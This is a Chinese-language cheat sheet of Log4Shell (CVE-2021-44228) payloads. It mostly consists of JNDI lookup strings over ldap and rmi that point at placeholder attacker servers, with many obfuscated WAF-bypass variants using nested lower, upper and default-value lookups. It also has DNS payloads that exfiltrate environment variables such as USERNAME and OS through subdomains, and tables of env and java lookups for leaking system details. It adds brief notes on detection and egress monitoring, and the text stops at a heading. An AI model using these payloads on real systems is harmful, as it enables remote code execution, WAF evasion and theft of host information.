log4j2 的 Lookup 机制支持很多数据源，例如 `${env:...}`、`${java:...}`、`${sys:...}`、`${docker:...}`，其中 `${jndi:...}` Lookup 又支持 ldap、rmi、dns 等协议。从网上大家的测试来看，构造 payload 主要使用 ldap（其次是 rmi）；dns 形式只会触发一次域名解析，不会加载远程类，一般用来确认漏洞存在或外带信息。注意：payload 只有在被受影响版本的 log4j2（CVE-2021-44228，2.0-beta9 ~ 2.14.1）真正写入日志时才会触发，ldap/rmi 形式还需要一台攻击者可控的 LDAP/RMI 服务；下面 payload 里的 127.0.0.1:1389、xxx.xxx.xxx.xxx、asdasd.asdasd.asdasd 等都是占位符，测试时要替换成自己的地址。详细参考这里：（原文链接缺失）
1.常用payload
${jndi:ldap://127.0.0.1:1389/Badclassname}
${jndi:ldap://xxx.xxx.xxx.xxx/exp}
//Windows（dns 外带：只做一次 DNS 解析，不会触发远程类加载，用于确认漏洞并把环境变量值带到子域名里；dnslog.com 替换成自己能看解析记录的域名）
${jndi:dns://${env:OS}.dnslog.com}
${jndi:dns://${env:USERNAME}.dnslog.com}
//过waf（原理：`${lower:x}`、`${upper:x}` 以及 `${::-x}` 默认值写法都是嵌套 Lookup，会在 jndi Lookup 执行前先被解析还原，所以只匹配字面 `jndi:`、`ldap://` 的 WAF 规则会漏掉；防守侧应先对嵌套 Lookup 做归一化再匹配，或者直接在出口监测异常的 LDAP/RMI/DNS 外连）
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://xxxxxxx.xx/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1:1389/Exploit.class}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://xxxxxxx.xx/poc}
log4j-java（这些 Lookup 不需要出网，结果只会写进日志；攻击者要拿到结果需要日志回显，或者像上面 dns:// payload 那样把它嵌进子域名外带）

| ID | usage | method |
|----|-------|--------|
| 1 | ${java:version} | getSystemProperty("java.version") |
| 2 | ${java:runtime} | getRuntime() |
| 3 | ${java:vm} | getVirtualMachine() |
| 4 | ${java:os} | getOperatingSystem() |
| 5 | ${java:hw} | getHardware() |
| 6 | ${java:locale} | getLocale() |
Linux

| id | usage |
|----|-------|
| 1 | ${env:CLASSPATH} |
| 2 | ${env:HOME} |
| 3 | ${env:JAVA_HOME} |
| 4 | ${env:LANG} |
| 5 | ${env:LOGNAME} |
| 6 | ${env:MAIL} |
| 7 | ${env:PATH} |
| 8 | ${env:PWD} |
| 9 | ${env:SHELL} |
| 10 | ${env:USER} |
Windows

| id | usage |
|----|-------|
| 1 | ${env:A8_HOME} |
| 2 | ${env:A8_ROOT_BIN} |
| 3 | ${env:CLASSPATH} |
| 4 | ${env:JRE_HOME} |
| 5 | ${env:Java_Home} |
| 6 | ${env:LOGONSERVER} |
| 7 | ${env:OS} |
| 8 | ${env:Path} |
| 9 | ${env:USERDOMAIN} |
| 10 | ${env:USERNAME} |
log4j2-sys